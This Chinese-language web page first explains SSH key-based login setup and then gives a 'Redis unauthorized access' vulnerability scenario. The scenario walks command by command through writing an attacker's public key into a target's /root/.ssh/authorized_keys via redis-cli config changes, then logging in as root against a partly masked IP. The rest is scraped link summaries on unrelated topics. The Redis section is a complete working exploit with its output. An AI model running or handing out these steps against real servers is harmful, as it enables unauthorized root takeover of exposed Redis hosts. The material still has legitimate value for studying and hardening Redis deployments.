密钥认证机制

创建存放key的文件

1)创建目录 /root/.ssh 并设置权限

[root@localhost ~]# mkdir /root/.ssh mkdir 命令用来创建目录，以后会详细介绍，暂时只了解即可。

[root@localhost ~]# chmod 700 /root/.ssh chmod 命令是用来修改文件属性权限的，以后会详细介绍。

2)创建文件 / root/.ssh/authorized_keys

[root@localhost ~]# vim /root/.ssh/authorized_keys

生成Key

Xshell-【新建用户密钥生成向导】，密钥类型选择RSA，密钥长度选择2048位，生成密钥名称，加密的密码。

复制生成的公钥到远程linux里面 /root/.ssh/authorized_keys 文件中。如果没有.ssh目录，就自行建立，并更改目录权限为700。粘贴公钥的内容，保存退出。

就可以利用密钥登录了

漏洞场景-redis未授权访问漏洞

1)本地生成秘钥

root@XXX:~# ssh-keygen -t rsa

2)将公钥写入一个文件

root@XXX:~# cd /root/.ssh/

root@XXX:~/.ssh# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

3)连接redis写入文件

root@XXX:~/.ssh# cat foo.txt | redis-cli -h 210.73.90.xxx -x set crackit

OK

root@XXX:~/.ssh# redis-cli -h 210.73.90.xxx

210.73.90.xxx:6379> config set dir /root/.ssh/

OK

(1.39s)

210.73.90.xxx:6379> CONFIG GET dir

1) "dir"

2) "/root/.ssh"

210.73.90.xxx:6379> config set dbfilename "authorized_keys"

OK

(1.03s)

210.73.90.xxx:6379> SAVE

OK

210.73.90.xxx:6379> exit

root@XXX:~/.ssh# ssh

4)连接服务器

root@XXX:~/.ssh# ssh -i id_rsa root@210.73.90.xxx【浅层优化实战】ssh远程登录Linux卡慢的全过程排查及解决方案

ssh远程登录Linux卡慢的全过程排查及解决方案 前言: 在linux操作系统使用过程中偶然一次感到使用ssh远程连接软件连接操作系统需要等待许久,第一次没在意,第二次也没在意,第三次有点忍受不住了 ...

搭建高性能计算环境(二)、远程登录Linux服务器

一般操作Linux系统都是通过远程登录使用的,本节介绍几种远程登录Linux.上传下载文件的工具. 1. Secure Shell SSH 简单方便.既能使用命令行登陆也能传文件,免费. 打开SSH ...

004远程登录Linux系统

通过windows主机远程登录Linux主机 前提一:从windows能ping通Linux 前提二:关闭Linux防火墙,运行命令:/etc/init.d/iptables stop (1)使用Pu ...

ssh远程登录linux服务器

ssh远程登录linux服务器 用法: ssh -l user -p port server_ip 或者 ssh -p port user@server_ip 参数: -l 后接要登录的远程系统用户名 ...

[国嵌笔记][008-009][远程登录Linux]

[国嵌笔记][008][远程登录Linux] 1.windows与Linux能够相互ping通 2.关闭Linux防火墙 /etc/init.d/iptables stop 3.通过ssh(字符界面) ...

ZH奶酪：putty远程登录Linux服务器非常慢

11.pytty远程登录Linux服务器非常慢 http://www.it165.net/os/html/201209/3425.html 12.启动SSHD服务报错 http://blog.chin ...

Windows远程登录Linux

本文以Ubuntu Kylin1404为例,说明如何通过Windows远程登录Linux. 首先,要确保Ubuntu上SSH服务执行正常.默认情况下,Ubuntu已装有SSHclient.比方输入ss ...

远程登录Linux系统(使用xshell)，远程上传加载文件(使用Xftp)

一.Xshell(远程登录Linux系统) 1.安装xshell 自己百度找安装包 2.连接登录 1.连接前提 需要Linux开启一个sshd的服务,监听22号端口,一般默认是开启的 查看是否开启: ...

Linux C/C++基础——Windows远程登录Linux

首先介绍两个ubuntu系统管理命令,用来测试连通性,及获取IP地址. 1.ping ping命令用来测试远程主机的连通性 使用方法:ping [参数] 远程主机IP地址 参数 功能 -a 每次相应时 ...

随机推荐

I’m Sure It Will Only Take You A Few Days To Code

from:http://danshipper.com/non-technical-people-cant-estimate-developmen “So the site’s pretty simpl ...

hdu 4770(枚举 + dfs爆搜)

题目链接:http://acm.hdu.edu.cn/showproblem.php?pid=4770 思路:由于最多只有15个".",可以直接枚举放置的位置,然后判断是否能够全部 ...

linxu ffmpeg 编译安装

1.下载ffmpeg. 下载网址:http://www.ffmpeg.org/download.html 2.解压缩 tar -zxvf ffmpeg-2.0.1.tar.gz 3.配置,生成Make ...

winform(公共控件)

一.客户端设计思路 1.理顺设计思路,架构框架 2.设计界面 3.编写后台代码 4.数据库访问 二.公共控件 1.Button(按钮): ⑴ Enabled :确定是否启用控件 ⑵ Visible:确 ...

android Fragments详解六:处理fragement的生命周期

把条目添加到动作栏 你的fragment们可以向activity的菜单(按Manu键时出现的东西)添加项,同时也可向动作栏(界面中顶部的那个区域)添加条目,这都需通过实现方法onCreateOptio ...

Unix环境编程基础下

Unix出错处理 当UNIX系统的函数出错时,通常会返回一个负值.我们判断函数的返回值小于0表示出错了,注意我们并不知道为什么出错.例如我们open一个文件,返回值-1表示打开失败,但是为什么打开失败 ...

QT5:C++实现基于Multimedia的音乐播放器(序)

前段时间C++课设,决定做个播放器,于是参考了网上的代码后,做了个很简陋的音乐播放器(只写了MP3格式)出来,虽然功能甚少,但还是决定把过程记录一下. 成品如下图: 播放器功能: 上.下一首,音量控制 ...

yolov3 安装训练

https://blog.csdn.net/helloworld1213800/article/details/79749359 https://blog.csdn.net/lilai619/arti ...

在 Django/Flask 开发服务器上使用 HTTPS

使用 Django 或 Flask 这种框架开发 web app 的时候一般都会用内建服务器开发和调试程序,等程序完成后再移交到生产环境部署.问题是这些内建服务器通常都不支持 HTTPS,我们想在开发 ...